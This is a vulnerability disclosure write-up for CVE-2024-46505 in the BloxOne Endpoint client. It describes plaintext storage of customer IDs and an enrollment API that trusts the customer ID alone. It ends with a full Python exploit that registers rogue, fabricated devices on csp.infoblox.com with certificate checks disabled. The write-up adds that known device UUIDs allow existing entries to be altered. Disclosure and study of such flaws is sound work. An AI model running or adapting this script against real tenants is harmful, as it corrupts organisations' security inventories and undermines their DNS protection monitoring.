Bloxone Business logic flaw due to thick client vulnerabilities — CVE-2024-46505
Introduction:
Product Description:
BloxOne Endpoint is a lightweight mobile agent that redirects DNS traffic from remote devices to the BloxOne Cloud. It uses DNS over Transport Layer Security (DoT) on TCP port 443 to communicate with BloxOne Cloud.
Summary of Findings:
During the assessment, it was found that it is possible to register rogue entries in csp.infobox.com (centralized dashboard) and can also modify the existing entries if we know the registered asset ID.
Overall Risk Rating:
High
Ease of Exploitation:
Easy
Environment Description:
High-Level Architecture Diagram:
Technology Stack Used to Develop the BloxOne Thick Client:
Swift, CPP, golang
Testing Standards Followed and Assessment Finding Categories:
Thick Client OWASP:
- DA3 — Sensitive Data Exposure (Thick client)
- DA7 — Insecure Communication (Thick client)
API OWASP:
- API6:2023 — Unrestricted Access to Sensitive Business Flows (API)
CWE:
- CWE-319: Cleartext Transmission of Sensitive Information (Thick Client)
- CWE-312: ClearText Storage in the Registry (Thick Client)
- CWE-798: Use of Hard-coded Credentials (Thick Client)
- CWE-269: Improper Privilege Management (API)
- CWE-20: Improper Input Validation (API)
Testing Methodology:
Information Gathering:
Tools Used:
Windows
- Echo Mirage
- Wireshark
- Microsoft Message Analyzer
- Sysinternals
- Burp Suite
MacOS
- Ghidra
- Sloth
- String Utility
- Burp Suite
Binaries Available Post Installation:
Windows
MACOSX
Reconnaissance:
Sensitive information is stored in a plist file on macOS and the Windows registry, and also logged in service.log located in /private/var/infoblox/atep/logs on macOS and in the standard installation path on Windows.
Windows:
MACOSX:
Abuse Case:
Details of Abuse Case:
To enroll, tag, report, and sync a new device using Bloxone Thick Client, it needs to use authorization with the central portal csp.infoblox.com. The Bloxone Thick Client uses the customer_id as its authentication and authorization token to interact with the SAAS web portal csp.infoblox.com. During the recon phase, a binary called ‘CoreDns’ was found to listen on 127.0.0.1:53. DNS queries made by the workstation are routed to 127.0.0.1:53, and the request is forwarded to the Bloxone DNS mentioned in the plist and registry.
After detailed inspection of “infoblox_rc_service” using “echo mirage” in Windows, it was observed that it makes a custom ID validation request routed through infoblox_rc_service -> CoreDNS -> csp.infoblox.com/api/v1/cfwc/validate. If the customer ID is valid, the infoblox_rc_service process sends a device enroll request csp.infoblox.com/api/v1/cfwc/login, which starts reporting and syncing with csp.infoblox.com.
customer ID validation request:
customer ID validation response:
Register device request:
Register device response:
Trace in MACOSX:
Since it relies only on the ‘customer id’ to register the device, it is possible to register rogue device entries in the system without installing the Bloxone Thick Client agent.
Exploitation:
Abuse case automated in the form of exploit code as below.
Per the design or intended functionality, one machine should have a single enrollment reported back on the dashboard. But with the help of the exploit below, I can register the rouge device(with all fake information like hostname, private/public IP, etc.) without the BloxOne agent installed on the machine.
If we know any reported machine's genuine registered UUID ID, we can modify the entry data or report them online, even if they are not.
# install below modules to before running the exploit code
pip3 install generate_mac
pip3 install indian_names
pip3 install requests'from generate_mac import generate_mac #install the dependant 'pip3 install generate_mac' and this module will help us to generate random network mac address
import uuid #this module will help us generate valid device ID in UUID format
import indian_names #install the dependant 'pip3 install generate_mac' and this module will help us to generate random indian names
import sys #this module will help us take argument required to run this exploit - customer_id
import random #this module will help us genrate random IP's
import requests #install the dependant 'pip3 install generate_mac' and this module will help us make the http api calls
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
customer_id=sys.argv[1]
#below definition will generate the HTTP POST payload to register the device
def generatepayload():
mac_add=generate_mac.total_random()
device_id=str(uuid.uuid4()).upper()
ip_add="192.168."+str(random.randint(0,250))+"."+str(random.randint(0,250))
name=indian_names.get_full_name()
public_ip_add=str(random.randint(100,250))+"."+str(random.randint(100,250))+"."+str(random.randint(100,250))+"."+str(random.randint(100,250))
payload='''{"client_id":"","user_id":"%s","device_info":"%s","device_uuid":"%s","os_platform":"ABRAKADABRA","version":"2.3.11","is_logs_uploaded":false,"region":"","public_ip_addr":"%s","net_info":{"fqdn":"%s.corp","ipv4_addr_list":["%s"],"mac_addr":["%s"],"state":{"protection":"PENDING_ACCOUNT_CHECK","upgrade":"NO_OPERATION"}}}'''% (name,device_id,device_id,public_ip_add,name,ip_add,mac_add)
return [name,payload]
#below definition will make a HTTP API call which will register the rouge entries
def req(customer_id,payload):
url="https://csp.infoblox.com/api/v1/cfwc/login"
headers = {"Authorization":"Token token=%s" % customer_id,"Accept":"*/*","Content-Type":"application/json"}
response = requests.post(url, data=payload[1], headers=headers,verify=False)
if response.status_code == 201:
client_id=str(response.json()['client_id'])
print("ROUGE ENTRY CREATED: "+response.json()['client_id'])
filename=payload[0]+"-"+client_id+".txt"
f=open(filename,"w")
f.writelines(response.content.decode('utf-8'))
f.close()
print("USER DETAILS YOU CAN SEARCH IN CSP.INFOBLOX.COM PORTAL: "+payload[0]+"\n"+"ENDPOINT URL: https://csp.infoblox.com/#/dns_security/endpoints/edit/"+client_id)
else:
print("EXPLOIT FAILED. PLEASE CHECK THE CUSTOMER ID OR THIS IS PACHED")
data=generatepayload()
req(customer_id,data)
